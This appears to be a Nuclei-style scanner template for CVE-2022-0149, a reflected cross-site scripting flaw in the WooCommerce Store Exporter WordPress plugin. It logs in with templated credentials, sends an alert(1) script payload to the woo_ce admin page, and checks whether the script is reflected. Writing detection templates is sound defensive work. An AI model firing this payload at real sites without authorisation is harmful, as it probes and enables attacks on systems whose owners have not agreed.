41 lines
1.1 KiB
YAML
41 lines
1.1 KiB
YAML
|
id: CVE-2022-0149
|
|||
|
|
|||
|
info:
|
|||
|
name: WooCommerce – Store Exporter < 2.7.1 - Reflected Cross-Site Scripting (XSS)
|
|||
|
author: dhiyaneshDk
|
|||
|
severity: medium
|
|||
|
description: The plugin was affected by a Reflected Cross-Site Scripting (XSS) vulnerability in the woo_ce admin page.
|
|||
|
reference: https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c
|
|||
|
tags: wordpress,wp-plugin,xss,feedwordpress
|
|||
|
|
|||
|
requests:
|
|||
|
- raw:
|
|||
|
- |
|
|||
|
POST /wp-login.php HTTP/1.1
|
|||
|
Host: {{Hostname}}
|
|||
|
Origin: {{RootURL}}
|
|||
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
|||
|
|
|||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
|||
|
- |
|
|||
|
GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3Cscript%3Ealert(1);%3C/script%3E HTTP/1.1
|
|||
|
Host: {{Hostname}}
|
|||
|
|
|||
|
cookie-reuse: true
|
|||
|
matchers-condition: and
|
|||
|
matchers:
|
|||
|
- type: word
|
|||
|
part: body
|
|||
|
words:
|
|||
|
- "<script>alert(1);</script>"
|
|||
|
|
|||
|
- type: word
|
|||
|
part: header
|
|||
|
words:
|
|||
|
- text/html
|
|||
|
|
|||
|
- type: status
|
|||
|
status:
|
|||
|
- 200
|